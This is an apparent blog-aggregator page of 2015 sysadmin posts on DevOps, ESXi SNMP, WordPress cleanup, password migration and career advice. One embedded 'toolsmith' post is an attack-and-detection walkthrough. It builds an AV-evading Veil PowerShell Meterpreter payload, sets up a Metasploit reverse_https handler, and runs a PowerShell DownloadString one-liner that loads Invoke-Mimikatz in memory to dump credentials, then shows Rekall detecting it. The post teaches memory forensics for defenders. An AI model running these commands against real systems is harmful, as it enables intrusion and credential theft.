You could reason that old ideas come back around, because the technology we have has either been improved or created to the point that they are now practical. I’ve learned to think of this not as a circle, but that we’re looking at it down along it’s axis. It’s more of a spiral moving linearly into the future. We just tend to not always see the progress and we ignore the past when we only see it as a circle.

Each of these ideas are not only applicable to our individual organizations, but to our field as a whole. Events like DevOpsDays are amazing opportunities for us to share our experiences and help mentor someone along for the little bit of time we have with them. Just remember to not pass up the change to get some mentoring of our own while you’re there.

If you find yourself starting out taking a DevOps approach to how your development team works you will need people to lead and champion those changes and mentors to share the ideas with everyone. If you don’t then it will become just another attempt to use a different methodology (think Agile or Lean) to improve the output of the team. And I think many reading this have unsuccessful experiences when those types of changes come down from management as a we’re doing this now. Here is a class or book. Now make it work.

Doesn’t matter what the change is if the team has the leadership, mentors, and chemistry they can make things happen or they have the weight to challenge ideas that will not work.

One final comment that I want to point out is these ideas don’t exclude self-managed organizations. The fire service is very structured. Pretty much you can think of it as paramilitary, but it’s made up of several self-managed teams who each have a fair amount of flexibility. You could say they are the pinnacle of the Results Only Work Environment and self-managed teams. And they succeed by taking care of their people with these ideas, after that everything else usually just falls into place.

May 07, 2015 07:45 AM

Anton Chuvakin - Security Warrior

Steve Kemp's Blog

On de-duplicating uploaded file-content.

This evening I've been mostly playing with removing duplicate content. I've had this idea for the past few days about object-storage, and obviously in that context if you can handle duplicate content cleanly that's a big win.

The naive implementation of object-storage involves splitting uploaded files into chunks, storing them separately, and writing database-entries such that you can reassemble the appropriate chunks when the object is retrieved.

If you store chunks on-disk, by the hash of their contents, then things are nice and simple.

The end result is that you might upload the file /etc/passwd, split that into four-byte chunks, and then hash each chunk using SHA256.

This leaves you with some database-entries, and a bunch of files on-disk:


In my toy-code I wrote out the data in 4-byte chunks, which is grossly ineffeciant. But the value of using such small pieces is that there is liable to be a lot of collisions, and that means we save-space. It is a trade-off.

So the main thing I was experimenting with was the size of the chunks. If you make them too small you lose I/O due to the overhead of writing out so many small files, but you gain because collisions are common.

The rough testing I did involved using chunks of 16, 32, 128, 255, 512, 1024, 2048, and 4096 bytes. As sizes went up the overhead shrank, but also so did the collisions.

Unless you could handle the case of users uploading a lot of files like /bin/ls which are going to collide 100% of the time with prior uploads using larger chunks just didn't win as much as I thought they would.

I wrote a toy server using Sinatra & Ruby, which handles the splitting/hashing/and stored block-IDs in SQLite. It's not so novel given that it took only an hour or so to write.

The downside of my approach is also immediately apparent. All the data must live on a single machine - so that reassmbly works in the simple fashion. That's possible, even with lots of content if you use GlusterFS, or similar, but it's probably not a great approach in general. If you have large capacity storage avilable locally then this might would well enough for storing backups, etc, but .. yeah.

May 07, 2015 12:00 AM

May 06, 2015

Standalone Sysadmin

New Blog Theme is Up

The other day, I got an email from a loyal reader who let me know that, when you find Standalone SysAdmin on Google, you get a little warning that says, “This site may be hacked”. Well, that’s not good. It was clearly related to some adware that got installed a while back by accident (where “accident” means that WordPress allowed someone to upload a .htaccess file into my blog’s uploads directory, and then used that as a springboard for advertising Casino sites). Somehow, the vulnerability was severe enough that the wp-footer.php site was able to be modified as well. Ugh.

After cleaning up the uploads directory and removing the extraneous plugins that I wasn’t using, or didn’t like, or whatever, I went to clean up the footer, but I thought, “I wonder why my security scans didn’t pick this up?”. The blog runs Wordfence thanks to recommendations from several other bloggers, and it’s really good software. It was able to help me with cleaning up most of the modified files because it can compare the originals with what’s installed, and revert to the reference copy. But it didn’t do that with my theme.

As it turns out, the theme I was running was an antique one named Cleaker. I really liked how it looked at the time I installed it, which was back in 2009 when I migrated from Blogger. Well, you can’t even download Cleaker anymore, at least from the author. So why not use this as a chance to put something new in place?

Funny, that “Welcome to the Future” post mentions RSS, but practically no one reads blogs through RSS anymore. Oh, there are still some, but when Google killed Reader, RSS readers dropped almost off the radar, so you’re almost certainly reading this on the actual site, and that means you’re almost certainly seeing the new site theme. It’s a fairly standard one called Twenty Fourteen, which I’m sure will feel hilariously old when I get around to changing it in 2020. The banner image at the top rotates occasionally between several images that I’ve taken, or taken from, or from some other Free-Without-Attribution source. There are seriously tons of free image sources out there, if you’re looking.

Anyway, I just wanted to let you know that the look of the site has changed, so when I inevitably get around to writing more content, this is what you’ll be seeing. Unless, of course, everyone comments below to let me know that it sucks, which, if you think so, please do tell me. There are comments below for that kind of thing. If you like it, don’t like it, or are so ambivalent about it that you want to comment and let me know that too, then go for it. Thanks!

by Matt Simmons at May 06, 2015 11:04 AM

May 05, 2015

Ben's Practical Admin Blog

Fixing Errors When Trying to Configure SNMP on ESXi

One of the tasts I am working on is the configuration of our fleet of Dell servers to use Dell’s Open Manage Essentials monitoring and management platform. One of the servers however had been unwilling to have it’s SNMP configuration changed using the VSphere CLI tools and was generating the following error:

Changing notification(trap) targets list to: myserver.local@162/DELLOME…
Use of uninitialized value $sub in string eq at C:/Program Files (x86)/VMware/VMware vSphere CLI/Perl/lib/VMware/ line 81.
Use of uninitialized value $package in concatenation (.) or string at C:/Program Files (x86)/VMware/VMware vSphere CLI/Perl/lib/VMware/ l
ine 50.
Undefined subroutine &Can’t call method “ReconfigureSnmpAgent” on an undefined value at C:\Program Files (x86)\VMware\VMware vSphere CLI\bin\vicfg-snm line 297.
::fault_string called at C:\Program Files (x86)\VMware\VMware vSphere CLI\bin\ line 299.

Hrm OK fine. Lets try logging in to the Host’s ESX Shell and use esxcli to set the trap:

Community string was not specified in trap target: myserver.local

Clearly something is broken with the SNMP configuration. Luckily the VMware forums were quick to supply a solution.

The SNMP settings for ESX are stored in the XML file /etc/vmware/snmp.xml. You can either clear this file (cat /dev/null > /etc/vmware/snmp.xml) or if you know what the setting should be, modify it. in my case I needed to update the <targets></targets> XML Tag to have a community string:

<targets>myserver.local@162 DELLOME</targets>

by Ben at May 05, 2015 11:11 PM

May 04, 2015

Everything Sysadmin

Note to Boeing 787 Dreamliner owners: Reboot every 248 days

If you own a Boeing 787 Dreamliner, and I'm sure many of our readers do, you should reboot it every 248 days. In fact, more frequently than that because at about the 248-day mark, the power system will fail due to a software bug.

Considering that 248 days is about 2^31 * 100, it is pretty reasonable to assume there is a timer with 100 microsecond resolution timer held in a 32-bit unsigned int. It would overflow every 248 days.

"Hell yeah, I did it! I saved 4 bytes every time we store a timestamp. Screw you. It's awesome.
a software engineer that makes planes but doesn't have to operate them.

Reminds me of all the commercial software I've seen that was written by developers that didn't seem to care, or were ignorant of, the operational realities that their customers live with.

Last week at DevOpsDays NYC 2015 I was reminded time and time again that the most important part of DevOps is shared responsibility: The opposite of workers organized in silos of responsibilities, ignorant and unempathetic to the other silos.

May 04, 2015 03:00 PM

The awesomely epic guide to KDE

This article shows gives an overview of the major KDE features like font management, visual effects, file management, eye candy, the panels, the task switcer and more great KDE stuff.

May 04, 2015 12:00 AM

Steve Kemp's Blog

A weekend of migrations

This weekend has been all about migrations:

Host Migrations

I've migrated several more systems to the Jessie release of Debian GNU/Linux. No major surprises, and now I'm in a good state.

I have 18 hosts, and now 16 of them are running Jessie. One of them I won't touch for a while, and the other is a KVM-host which runs about 8 guests - so I won't upgraded that for a while (because I want to schedule the shutdown of the guests for the host-reboot).

Password Migrations

I've started migrating my passwords to pass, which is a simple shell wrapper around GPG. I generated a new password-managing key, and started migrating the passwords.

I dislike that account-names are stored in plaintext, but that seems known and unlikely to be fixed.

I've "solved" the problem by dividing all my accounts into "Those that I wish to disclose post-death" (i.e. "banking", "amazon", "facebook", etc, etc), and those that are "never to be shared". The former are migrating, the latter are not.

(Yeah I'm thinking about estates at the moment, near-death things have that effect!)

May 04, 2015 12:00 AM

May 03, 2015

Everything Sysadmin

Raspberry Pi Arcade Machine

This article shows you how to build your own full size arcade machine using a Raspberry Pi. It involves a real, full size arcade cabinet, a converter device called a J-Pac and the MAME emulator software.

May 03, 2015 12:00 AM

Filing Effective Bug Reports

This article shows you how to report bugs properly and help open source projects by doing so. It explains the things that help create a good bug report, one on which the developers can actually work on. It also explains the process of bug reporting, what happens after you've did the initial report?

May 03, 2015 12:00 AM

May 02, 2015

Warren Guy

Planet SysAdmin: Call for blogs

I'm devoting a little time this weekend to the upkeep of Planet SysAdmin, so I'm putting out a call for new content.

Do you write a system administration, tech, security or otherwise relevant blog? Know of one that other SysAdmins might enjoy or find useful? Then please let me know about it! Comment below or send me an email.

Read full post

May 02, 2015 02:51 AM

May 01, 2015

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – April 2015

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this month:
  1. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009. Is it relevant now? Well, you be the judge.  Current emergence of open source log search tools, BTW, does not break the logic of that post. SIEM requires a lot of work, whether you paid for the software, or not. [282 pageviews]
  2. Simple Log Review Checklist Released!” is often at the top of this list – the checklist is still a very useful tool for many people. “On Free Log Management Tools” is a companion to the checklist (updated version) [116 pageviews]
  3. Top 10 Criteria for a SIEM?” came from one of my last projects I did when running my SIEM consulting firm in 2009-2011 (for my recent work on evaluating SIEM, see this document) [114 pageviews]
  4. My classic PCI DSS Log Review series is always popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3.0 as well), useful for building log review processes and procedures , whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (just out in its 4th edition!) [100+ pageviews to the main tag]
  5. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. [92 pageviews of total 5079 pageviews to all blog pages]
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog:

Current research on security analytics:
Miscellaneous fun posts:
(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014.
Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on Aug 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.
Previous post in this endless series:

by Anton Chuvakin ( at May 01, 2015 06:11 PM

Adnans Sysadmin/Dev Blog

Why I don't like that Mozilla is "Deprecating non-secure HTTP"

Mozilla wants to deprecate non-secure HTTP, will make proposals to W3C ‘soon’

I'm a blogger and sysadmin. I like running servers, and I like to write. Being able to buy a domain and a server was all I needed to do in order to run a blog. Sometimes I used to use dynamic dns if I wanted to run the blog on my own server at home. Now I need to buy a security cert, which is more money. And we already know the kinds of companies that publish certs. Its hard to trust them after the reputation they have earned. Plus there is the added hassle of configuring the server with the cert you just bought.

If I use a self signed cert like most student bloggers are probably going to do, there is going to be an ugly warning to people who just happen to run across your blog. The warning is bad enough to scare away any potential readers of your blog.

As it is, blogging on your own server is not popular. The above is a simple way of killing it. Who is going to go through this hassle? Instead of making things easier, we've just made it harder.

I don't like it.

Whats the point of requiring security on the public facing page of a blog? It makes no sense. I want people to read what I write, and there is no requirement for security. The admin interface for a blog is a different story. There you want security since you have to enter credentials and secure your admin interface from spammers. Which means it makes sense to secure some parts of a website, and not others.

There was a recent post on hacker news (I can't find the link) of an admin asking mozilla to reconsider, since this would break the way a lot of academics worked.

And all this just because companies out there are too lazy to secure their websites, putting their customers in danger. Why are indie web developers being punished for the laziness of large companies?

Here is another well reasoned article on this topic.

Found this quote which seemed apt:
One must stress that it was not merely technological wizardry that set people dreaming: it was also the openness of the industry then rising up. The barriers to entry were low. Radio in the 1920s was a two-way medium accessible to most any hobbyist, and for a larger sum any club or other institution could launch a small broadcast station. Compare the present moment: radio is hardly our most vital medium, yet it is hard if not impossible to get a radio license, and to broadcast without one is a federal felony. In 1920, De Forest advised, “Obtaining the license is a very simple matter and costs nothing.”
- Tim Wu, The Master Switch

by Adnan Wasim ( at May 01, 2015 04:56 PM

toolsmith: Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem

Any Python-enable system if running from source
There is a standalone exe with all dependencies met, available for Windows


This month represents our annual infosec tools edition, and I’ve got a full scenario queued up for you. We’re running with a vignette based in absolute reality. When your organizations are attacked (you already have been) and a compromise occurs (assume it will) it may well follow a script (pun intended) something like this. The most important lesson to be learned here is how to assess attacks of this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011 we invited readers to embrace memory analysis as an absolutely critical capability for incident responders and forensic analysts. This month, in a similar vein, we’ll explore Rekall. The project’s point man, Michael Cohen branched Volatility, aka the scudette branch, in December 2011, as a Technology Preview. In December 2013, it was completely forked and became Rekall to allow inclusion in GRR as well as methods for memory acquisition, and to advance the state of the art in memory analysis. The 2nd of April, 2015, saw the release of Rekall 1.3.1 Dammastock, named for Dammastock Mountain in the Swiss Alps. An update release to 1.3.2 was posted to Github 26 APR 2015.
Michael provided personal insight into his process and philosophy, which I’ll share verbatim in part here:
For me memory analysis is such an exciting field. As a field it is wedged between so many other disciplines - such as reverse engineering, operating systems, data structures and algorithms. Rekall as a framework requires expertise in all these fields and more. It is exciting for me to put memory analysis to use in new ways. When we first started experimenting with live analysis I was surprised how reliable and stable this was. No need to take and manage large memory images all the time. The best part was that we could just run remote analysis for triage using a tool like GRR - so now we could run the analysis not on one machine at the time but several thousand at a time! Then, when we added virtual machine introspection support we could run memory analysis on the VM guest from outside without any special support in the hypervisor - and it just worked!
While we won’t cover GRR here, recognize that the ability to conduct live memory analysis across thousands of machines, physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators.

Scenario Overview

We start with the assertion that the red team’s attack graph is the blue team’s kill chain.
Per Captain Obvious: The better defenders (blue team) understand attacker methods (red team) the more able they are to defend against them. Conversely, red teamers who are aware of blue team detection and analysis tactics, the more readily they can evade them.
As we peel back this scenario, we’ll explore both sides of the fight; I’ll walk you through the entire process including attack and detection. I’ll evade and exfiltrate, then detect and define.
As you might imagine the attack starts with a targeted phishing attack. We won’t linger here, you’ve all seen the like. The key take away for red and blue, the more enticing the lure, the more numerous the bites. Surveys promising rewards are particularly successful, everyone wants to “win” something, and sadly, many are willing to click and execute payloads to achieve their goal. These folks are the red team’s best friend and the blue team’s bane. Once the payload is delivered and executed for an initial foothold, the focus moves to escalation of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts (credentials, hashes), causing effect becomes trivial, and often leads to total compromise. For this exercise, we’ll assume we’ve compromised a user who is running their system with administrative privileges, which sadly remains all too common. With some great PowerShell and the omniscient and almighty Mimikatz, the victim’s network can be your playground. I’ll show you how.


Keep in mind, I’m going into some detail here regarding attack methods so we can then play them back from the defender’s perspective with Rekall, WinPmem, and VolDiff.

All good phishing attacks need a great payload, and one of the best ways to ensure you deliver one is Christopher Truncer’s (@ChrisTruncer) Veil-Evasion, part of the Veil-Framework. The most important aspect of Veil use is creating payload that evade antimalware detection. This limits attack awareness for the monitoring and incident response teams as no initial alerts are generated. While the payload does land on the victim’s file system, it’s not likely to end up quarantined or deleted, happily delivering its expected functionality.
I installed Veil-Evasion on my Kali VM easily:
1)      apt-get install veil
2)      cd /usr/share/veil-evasion/setup
3)      ./
Thereafter, to run Veil you need only execute veil-evasion.
Veil includes 35 payloads at present, choose list to review them.
I chose 17) powershell/meterpreter/rev_https as seen in Figure 1.

Figure 1 – Veil payload options
I ran set LHOST for my Kali server acting as the payload handler, followed by info to confirm, and generate to create the payload. I named the payload toolsmith, which Veil saved as toolsmith.bat. If you happened to view the .bat file in a text editor you’d see nothing other than what appears to be a reasonably innocuous PowerShell script with a large Base64 string. Many a responder would potentially roll right past the file as part of normal PowerShell administration. In a real-world penetration test, this would be the payload delivered via spear phishing, ideally to personnel known to have privileged access to key terrain.

This step assumes our victim has executed our payload in a time period of our choosing. Obviously set up your handlers before sending your phishing mail. I will not discuss persistence here for brevity’s sake but imagine that an attacker will take steps to ensure continued access. Read Fishnet Security’s How-To: Post-ExPersistence Scripting with PowerSploit & Veil as a great primer on these methods.
Again, on my Kali system I set up a handler for the shell access created by the Veil payload.
1)      cd /opt/metasploit/app/
2)      msfconsole
3)      use exploit/multi/handler
4)      set payload windows/meterpreter/reverse_https
5)      set lhost
6)      set lport 8443
7)      set exitonsession false
8)      run exploit –j
At this point backreturns you to the root msf >prompt.
When the victim executes toolsmith.bat, the handler reacts with a Meterpreter session as seen in Figure 2.

Figure 2 – Victim Meterpreter session
Use sessions –lto list sessions available, use sessions -i 2 to use the session seen in Figure 2.
I know have an interactive shell with the victim system and have some options. As I’m trying to exemplify running almost entirely in victim memory, I opted to not to copy additional scripts to the victim, but if I did so it would be another PowerShell script to make use of Joe Bialek’s (@JosephBialek) Invoke-Mimikatz, which leverages Benjamin Delpy’s (@gentilkiwi) Mimikatz. Instead I pulled down Joe’s script directly from Github and ran it directly in memory, no file system attributes.
From the MSF console, I first ran spool /root/meterpreter_output.txt.
Then via the Meterpreter session, I executed the following.
1) getsystem (if the user is running as admin you’ll see “got system”)
2) shell
3) powershell.exe "iex (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"
A brief explanation here. The shell command spawns a command prompt on the victim system, getsystem ensures that you’re running as local system (NT AUTHORITY\SYSTEM) which is important when you’re using Joe’s script to leverage Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again our goal here is to conduct activity such as dumping credentials without ever writing the Mimikatz binary to the victim file system. Our last line does so in an even craftier manner. To prevent the need to write out put to the victim file system I used the spool command to write all content back to a text file on my Kali system. I used PowerShell’s ability to read in Joe’s script directly from Github into memory and poach credentials accordingly. Back on my Kali system a review of /root/meterpreter_output.txt confirms the win. Figure 3 displays the results.

Figure 3 – Invoke-Mimikatz for the win!
If I had pivoted from this system and moved to a heavily used system such as a terminal server or an Exchange server, I may have acquired domain admin credentials as well. I’d certainly have acquired local admin credentials, and no one ever uses the same local admin credentials across multiple systems, right? ;-)
Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took place in memory. How do we spot such behavior and defend against it? Time for Rekall and WinPmem, because they “can remember it for you wholesale!”


Rekall preparation

Installing Rekall on Windows is as easy as grabbing the installer from Github, 1.3.2 as this is written.
On x64 systems it will install to C:\Program Files\Rekall, you can add this to your PATH so you can run Rekall from anywhere.


WinPmem 1.6.2 is the current stable version and WinPmem 2.0 Alpha is the development release. Both are included on the project Github site. Having an imager embedded with the project is a major benefit, and it’s developed against with a passion.
Running WinPmem for live response is as simple as winpmem.exe –l to load the driver so you launch Rekall to mount the winpmem device with rekal -f \\.\pmem (this cannot be changed) for live memory analysis.

Rekall use

There are a few ways to go about using Rekall. You can take a full memory image, locally with WinPmem, or remotely with GRR, and bring the image back to your analysis workstation. You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from Volatility. On the Windows 7 x64 system I compromised with the attack described above I first ran winpmem_1.6.2.exe compromised.raw and shipped the 4GB memory image to my workstation. You can simply run rekal which will drop you into the interactive shell. As an example I ran, rekal –f D:\forensics\memoryImages\toolsmith\compromised.raw, then from the shell ran various plugins. Alternatively I could have run rekal –f D:\forensics\memoryImages\toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the “most powerful and flexible interface” most importantly because it allows session management and storage specific to an image analysis.

Suspicious Indicator #1
From the interactive shell I started with the netstat plugin, as I always do. Might as well see who it talking to who, yes? We’re treated to the instant results seen in Figure 4.

Figure 4 – Rekall netstat plugin shows PowerShell with connections
Yep, sure enough we see a connection to our above mention attacker at, the “owner” is attributed to powershell.exe and the PIDs are 1284 and 2396.

Suspicious Indicator #2
With the pstree plugin we can determine the parent PIDs (PPID) for the PowerShell processes. What’s odd here from a defender’s perspective is that each PowerShell process seen in the pstree (Figure 5) is spawned from cmd.exe. While not at all conclusive, it is at least intriguing.

Figure 5 – Rekall pstree plugin shows powershell.exe PPIDs
Suspicious Indicator #3
I used malfind to find hidden or injected code/DLLs and dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir="/tmp/" I received feedback on PID 1284 (repeated for 2396), with indications specific to Trojan:Win32/Swrort.A. From the MMPC write-upTrojan:Win32/Swrort.A is a detection for files that try to connect to a remote server. Once connected, an attacker can perform malicious routines such as downloading other files. They can be installed from a malicious site or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers.” Hmm, sound familiar from the attack scenario above? ;-) Note that the netstat plugin found that powershell.exe was connecting via 8443 (a “different” port number).     

Suspicious Indicator #4
To close the loop on this analysis, I used memdump for a few key reasons. This plugin dumps all addressable memory in a process, enumerates the process page tables and writes them out into an external file, creates an index file useful for finding the related virtual address. I did so with memdump pid=2396, dump_dir="/tmp/", ditto for PID 1284. You can use the .dmp output to scan for malware signatures or other patterns. One such method is strings keyword searches. Given that we are responding to what we can reasonably assert is an attack via PowerShell a keyword-based string search is definitely in order. I used my favorite context-driven strings tool and searched for invokeagainst powershell.exe_2396.dmp. The results paid immediate dividends, I’ve combined to critical matches in Figure 6.

Figure 6 – Strings results for keyword search from memdump output
Suspicions confirmed, this box be owned, aargh!
The strings results on the left show the initial execution of the PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy followed by a slew of Base64 that is the powershell/meterpreter/rev_https payload. The strings results on the left show when Invoke-Mimikatz.ps1 was actually executed.
Four quick steps with Rekall and we’ve, in essence, reversed the steps described in the attack phase.
Remember too, we could just as easily have conducted these same step on a live victim system with the same plugins via the following:
rekal -f \\.\pmem netstat
rekal -f \\.\pmem pstree
rekal -f \\.\pmem malfind pid=1284, dump_dir="/tmp/"
rekal -f \\.\pmem memdump pid=2396, dump_dir="/tmp/"

In Conclusion

In celebration of the annual infosec tools addition, we’ve definitely gone a bit hog wild, but because it has been for me, I have to imagine you’ll find this level of process and detail useful. Michael and team have done wonderful work with Rekall and WinPmem. I’d love to hear your feedback on your usage, particularly with regard to close, cooperative efforts between your red and blue teams. If you’re not yet using these tools yet, you should be, and I recommend a long, hard look at GRR as well. I’d also like to give more credit where it’s due. In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They include Microsoft’s Mike Fanning, root9b’s Travis Lee (@eelsivart), and Laconicly’s Billy Rios (@xssniper). Thank you for everything, gentlemen.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.


Michael Cohen, Rekall/GRR developer and project lead (@scudette)

by Russ McRee ( at May 01, 2015 03:50 PM


Career Advice: Becoming a System Administrator

Recently, I got an email that went something like this:

I have completed a BTech in Electronics and Communication. Now, I am working as a desktop engineer. How can I move my career to the network / server side?

Career moves are hard for everyone. Personally, I've been thinking about making a change in my career for a long time as well. I have two recommendations for you:

1) If your current employer has a policy of hiring from within, keep your eyes open for opportunities within your own organization. Since your current company already has you onboard, they are motivated to hire you. If you've already shown your value to the company in your existing position, you are even more likely to get that chance.

2) I'm assuming that you are having a hard time getting your foot in the door with network / server administrator positions. Many hiring managers do not want to take a risk on an unknown or unproven candidate when there are so many candidates out there. To put them at ease, you might consider a certification or two in the area you are most interested in working. For example, becoming an MCSE is one way to prove your expertise as a Windows server administrator.

Best of luck!

by Scott Hebert at May 01, 2015 01:00 PM

April 30, 2015


The Need for Test Data

Last week at the RSA Conference, I spoke to several vendors about their challenges offering products and services in the security arena. One mentioned a problem I had not heard before, but which made sense to me. The same topic will likely resonate with security researchers, academics, and developers.

The vendor said that his company needed access to large amounts of realistic computing evidence to test and refine their product and service. For example, if a vendor develops software that inspects network traffic, it's important to have realistic network traffic on hand. The same is true of software that works on the endpoint, or on application logs.

Nothing in the lab is quite the same as what one finds in the wild. If vendors create products that work well in the lab but fail in production, no one wins. The same is true for those who conduct research, either as coders or academics.

When I asked vendors about their challenges, I was looking for issues that might meet the criteria of Allan Friedman's new project, as reported in the Federal Register: Stakeholder Engagement on Cybersecurity in the Digital Ecosystem. Allan's work at the Department of Commerce seeks "substantive cybersecurity issues that affect the digital ecosystem and digital economic growth where broad consensus, coordinated action, and the development of best practices could substantially improve security for organizations and consumers."

I don't know if "realistic computing evidence" counts, but perhaps others have ideas that are helpful?

by Richard Bejtlich ( at April 30, 2015 09:22 PM

April 27, 2015

Michael Biven

We’ve not solved all of the problems we think we have with DevOps

After attending DevOpsDays Rockies I have to say it was an amazing event and both the organizers and sponsors have my thanks for putting together such a well run two day talk.

And it was also nice seeing two former coworkers again and listening to them as they participated in the ChatOps panel.

The Tools Don’t Matter

It was encouraging to see what I thought was an undercurrent of “it’s the people and not the tools” theme happening throughout most of the talks and open spaces.

Matt Stratton from Chef talked about “Managing Your Mental Stack” and Royce Haynes from Next Big Sound described his experience “Operating in a self-managed and self-organized company”. Both reflected this theme in a very direct way. Along with Dave Josephsen from Librato who gave a lighting talk called “Good to meet you; I’m an impostor here myself”. His message of we need less of us and more of you was very encouraging and I wish more people would follow that advice. And at least two different open spaces dealt with the people side of things… “How to escape the echo chamber” and “creating cohesion throughout all departments”.

Being technical people we tend to forget that most problems boil down to a communication breakdown or some other issue coming out of us people interacting with each other.

But what stood out to me the most after having attended the first and third DevOpsDays held in the US is that we are still struggling with the same questions we had five years ago.

As a professional community we’ve been focused on the tools side of things and haven’t addressed the people and management aspects of what we were asking about in 2010.

This is reflected by two common topics brought up by some attendees that I talked with or heard from during the open spaces. How to bring a Devops approach to their current workplace and issues related to communicating their needs and justifying them to management or other teams.

That we’re still asking how to get started makes me wonder as a community if we are doing enough to show others how to do so and if we actually even know what our own needs are ourselves.

Being people we still have issues with focusing on tasks at had and if you consider the amount of new technology and information being released throughout the year we shouldn’t be surprised that this is an issue.

The pace of using a new technology or technique to the point that you understand it and have an informed opinion of it will probably always be slower than the release of the next new thing. How can we expect ourselves to make good choices if we’re constantly moving from one thing to the next?

By focusing on the tools or the technology instead of the problem we’ve not advanced as far as we may think we have. It’s like we continue to just scratch the surface of the problem and then have another configuration management, deploy framework, or monitoring service introduced that we then consider and never really go beyond that. And now we have containers and related frameworks added to that menagerie of things we’ve been focused on.

I mean we’re still talking about the benefits of infrastructure as code, monitoring and testing like they are new things.

Consider the following six titles of talks given at various DevopsDays. Can you pick which one is from about five years ago or more?

Infrastructure as code

DevOps requires visibility

5 Common Barriers when Introducing Devops

Making the business case

Continuous Integration, Pipelines and Deployment

Changing culture to enable DevOps

To add a bit of a gap to the answer to that question watch this short five minute intro video that was show at the first DevOpsDays in Mountain View from 2010.

Five of those titles are talks from DevOpsDays in 2010 and 2011. The odd man out is the “5 Common Barriers when Introducing Devops” talk that was given during DevOpsDays Silicon Valley 2014. Yet any of these could have easily been a talk given more recently.

Our profession is more than just a slide deck and this is not to diminish the information shared by any presenter. It is to say that we need to take these litle sparks of ideas and information and build upon them. Use them as a queue to dig deeper into these problems that we keep talking about. Otherwise in my opinion it feels more like we’re treading water and not making the advancements we could be making.

April 27, 2015 03:30 PM

Steve Kemp's Blog

Validating puppet manifests via git hooks.

It looks like I'll be spending a lot of time working with puppet over the coming weeks.

I've setup some toy deployments on virtual machines, and have converted several of my own hosts to using it, rather than my own slaughter system.

When it comes to puppet some things are good, and some things are bad, as exected, and as any similar tool (even my own). At the moment I'm just aiming for consistency and making sure I can control all the systems - BSD, Debian GNU/Linux, Ubuntu, Microsoft Windows, etc.

Little changes are making me happy though - rather than using a local git pre-commit hook to validate puppet manifests I'm now doing that checking on the server-side via a git pre-receive hook.

Doing it on the server-side means that I can never forget to add the local hook and future-colleagues can similarly never make this mistake, and commit malformed puppetry.

It is almost a shame there isn't a decent collection of example git-hooks, for doing things like this puppet-validation. Maybe there is and I've missed it.

It only crossed my mind because I've had to write several of these recently - a hook to rebuild a static website when the repository has a new markdown file pushed to it, a hook to validate syntax when pushes are attempted, and another hook to deny updates if the C-code fails to compile.

April 27, 2015 12:00 AM

April 23, 2015


I'm not a developer but...

...I'm sure spending a lot of time in code lately.

Really. Over the last five months, I'd say that 80% of my normal working hours are spent grinding on puppet code. Or training others in getting them to maybe do some puppet stuff. I've even got some continuous integration work in, building a trio of sanity-tests for our puppet infrastructure:

  • 'puppet parser validate' returns OK for all .pp files.
    • Still on the 'current' parser, we haven't gotten as far as future/puppet4 yet.
  • puppet-lint returns no errors for the modules we've cleared.
    • This required extensive style-fixes before I put it in.
  • Catalogs compile for a certain set of machines we have.
    • I'm most proud of this, as this check actually finds dependency problems unlike puppet-parser.

Completely unsurprising, the CI stuff has actually caught bugs before it got pushed to production! Whoa! One of these days I'll be able to grab some of the others and demo this stuff, but we're off-boarding a senior admin right now and the brain-dumping is not being done by me for a few weeks.

We're inching closer to getting things rigged that a passing-build in the 'master' branch triggers an automatic deployment. That will take a bit of thought about, as some deploys (such as class-name changes) require coordinated modifications in other systems.

by SysAdmin1138 at April 23, 2015 07:30 PM

The Tech Teapot

Observations on 8 Issues of C# Weekly

At the end of 2013 I thought it would be interesting to create a C# focused weekly newsletter. I registered the domain and created a website and hooked it up to the excellent MailChimp email service. The site went live (or at least Google Analytics was added to the site) on the 18th December 2013.

And then I kind of forgot about it for a year or so.

In the mean time the website was getting subscribers. Not many but enough to suggest that there’s an appetite for a weekly C# focused newsletter.

The original website was a simple affair, just a standard landing page written using Bootstrap. Simple it may have been, but rather effective.

I figured that I might as well give the newsletter a go. Whilst the audience wasn’t very big (it still isn’t), it was big enough to give some idea whether the newsletter was working or not.

I’ve now curated eight issues, I thought it about time to take stock. The first issue was sent on Friday 27th February 2015 and has been sent every Friday since.

C# Weekly Subscriber Chart

C# Weekly Subscribers

The number of subscribers has grown over the last eight weeks, starting from a base of 194 subscribers there are now 231. A net increase of 37 in eight weeks. Of course there have been unsubscribes, but the new subscribers each week have always outnumbered them.

C# Weekly Website Visitors Chart

C# Weekly Website Visitors

The website traffic has also trended upwards over the last year, especially since the first issue was curated. Now there are a number of pages on the website, the site is receiving more traffic from the search engines. The number of visitors is not high, but at least progress is being made.

